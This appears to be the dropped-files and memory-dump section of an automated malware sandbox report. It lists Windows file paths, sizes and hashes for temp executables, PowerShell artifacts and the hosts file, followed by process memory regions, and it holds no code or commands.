C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
420B

MD5
d933be12f5723cd041381813106b9041

SHA1
c874649f35a6d8775aad47ea6d5e6b6ca35641a2

SHA256
2ceea2dffab4b6a0e13ae4ff68c36605e8f5b56f699a3337938bd998776868ce

SHA512
cb2135399e547caf31c09ca7ba56ef1f10882d2a09e7edfa30c75f3169243b2d1b48810d4328d6677999d6a2378dc3294b7a0745abcd0cc70b4bedc1ae5ef1f5

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
290B

MD5
7445e041934724e378dcd161f80ead88

SHA1
0e0e67c07b390b1469d3e0ba6bf677ab20566d30

SHA256
b6ac03f13585b949d5f8542ac777137a1ba51d510570351f5d9fa82b8d9d2d1e

SHA512
7cf6f43ba6a2c1764580d9e14228b78870662b700a7ead4f78af1de3d4433065be5382baecbb9aa23cdd06ed3d640ff054d893c160b43914ee0ba0e626811224

Download Submit
C:\Users\Admin\AppData\Local\Temp\REAL XEON.exe

Filesize
1.8MB

MD5
53821ade39d6c31820062190b753547d

SHA1
0b9987172abddac05c1e8c67aa979db5596c9a6f

SHA256
c296811e87815360a718e4e5291bc0f7844acc25c72ad7c71e1504a2ad47ca37

SHA512
ed542bca9aa6c14a3ccd0dd1a18a5dd2ff412859ab3bb43da890cffa326d95f1e00c61210fa09a4f82ce9da05f0e7dbbea6280d2d24da5f8607f1f148192dce4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RavenZephyrv2.exe

Filesize
5.3MB

MD5
7bda2ed86f648c8528531d76f0a53f2a

SHA1
5c852efdb51b00cbfa0dc0ca0d017a3f52dae069

SHA256
667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2

SHA512
075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5byt024a.5qi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
3KB

MD5
6db666b8eea8c87bb44fc342dbda5fcb

SHA1
2536fb957e13fd2144e482970707286ca2625816

SHA256
079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438

SHA512
88fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
35d6dc85f8160a917fd1cfc3a0ba8874

SHA1
fdbb4749a5c098b123cd4f946debd0fb5e4c409e

SHA256
a165677049585793834a28f030a9414cb0eea85ec94a60a0be400809e43a0374

SHA512
95a51a8bec50eaeffb8b33727442a52d975b4f6262ebdcf08f8a94e9e1684594bc1cf021e1c1f919445d6e61e5778fe2f6dc7bf5d67d4883ab151cfbab2032c8

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
4d4f2dd754c8e7c3875c0cc550489b42

SHA1
5349236f1a29f427fe1ea00d420d7b2aace7f4c3

SHA256
28cbbe89a4588e4ecadd143a3d420863b2a027723410a6ca6d179d47de120e7f

SHA512
1dcc77f74f3541f30377a64eb22b255e9063d01e16d061df2082f20c9926660533bf08a59f88ca7e06bfcc88cf4a6e827d508921a57aa665be0af9c475b44fbb

Download Submit
memory/624-145-0x0000026E07590000-0x0000026E075BB000-memory.dmp

Filesize
172KB

Download
memory/624-153-0x00007FFA17290000-0x00007FFA172A0000-memory.dmp

Filesize
64KB

Download
memory/624-152-0x0000026E07590000-0x0000026E075BB000-memory.dmp

Filesize
172KB

Download
memory/624-144-0x0000026E07560000-0x0000026E07585000-memory.dmp

Filesize
148KB

Download
memory/624-146-0x0000026E07590000-0x0000026E075BB000-memory.dmp

Filesize
172KB

Download
memory/676-157-0x0000022960F60000-0x0000022960F8B000-memory.dmp

Filesize
172KB

Download
memory/936-83-0x000001AF7DC40000-0x000001AF7DC5C000-memory.dmp

Filesize
112KB

Download
memory/936-85-0x000001AF7DC30000-0x000001AF7DC3A000-memory.dmp

Filesize
40KB

Download
memory/936-84-0x000001AF7DC60000-0x000001AF7DD15000-memory.dmp

Filesize
724KB

Download
memory/1120-124-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1120-141-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1120-122-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1120-121-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1120-123-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1120-126-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1120-127-0x00007FFA57210000-0x00007FFA57408000-memory.dmp

Filesize
2.0MB

Download
memory/1120-128-0x00007FFA56AD0000-0x00007FFA56B8D000-memory.dmp

Filesize
756KB

Download
memory/1524-0-0x00007FFA39225000-0x00007FFA39226000-memory.dmp

Filesize
4KB

Download
memory/1524-10-0x00007FFA38F70000-0x00007FFA39911000-memory.dmp

Filesize
9.6MB

Download
memory/1524-29-0x00007FFA38F70000-0x00007FFA39911000-memory.dmp

Filesize
9.6MB

Download
memory/1524-2-0x00007FFA38F70000-0x00007FFA39911000-memory.dmp

Filesize
9.6MB

Download
memory/2928-50-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2928-47-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2928-49-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2928-52-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2928-48-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/3168-118-0x00007FFA57210000-0x00007FFA57408000-memory.dmp

Filesize
2.0MB

Download
memory/3168-119-0x00007FFA56AD0000-0x00007FFA56B8D000-memory.dmp

Filesize
756KB

Download
memory/3168-117-0x000002D148970000-0x000002D14899A000-memory.dmp

Filesize
168KB

Download
memory/3696-103-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-110-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-114-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-106-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-104-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-107-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-108-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-109-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-111-0x00000219E71F0000-0x00000219E7210000-memory.dmp

Filesize
128KB

Download
memory/3696-113-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-115-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-112-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/3696-116-0x0000000140000000-0x0000000140835000-memory.dmp

Filesize
8.2MB

Download
memory/4388-99-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4388-95-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4388-97-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4388-105-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4388-98-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4388-96-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4452-45-0x00007FFA37C90000-0x00007FFA38752000-memory.dmp

Filesize
10.8MB

Download
memory/4452-42-0x00007FFA37C90000-0x00007FFA38752000-memory.dmp

Filesize
10.8MB

Download
memory/4452-41-0x00007FFA37C90000-0x00007FFA38752000-memory.dmp

Filesize
10.8MB

Download
memory/4452-40-0x0000023DEB040000-0x0000023DEB062000-memory.dmp

Filesize
136KB

Download
memory/4452-30-0x00007FFA37C93000-0x00007FFA37C95000-memory.dmp

Filesize
8KB

Download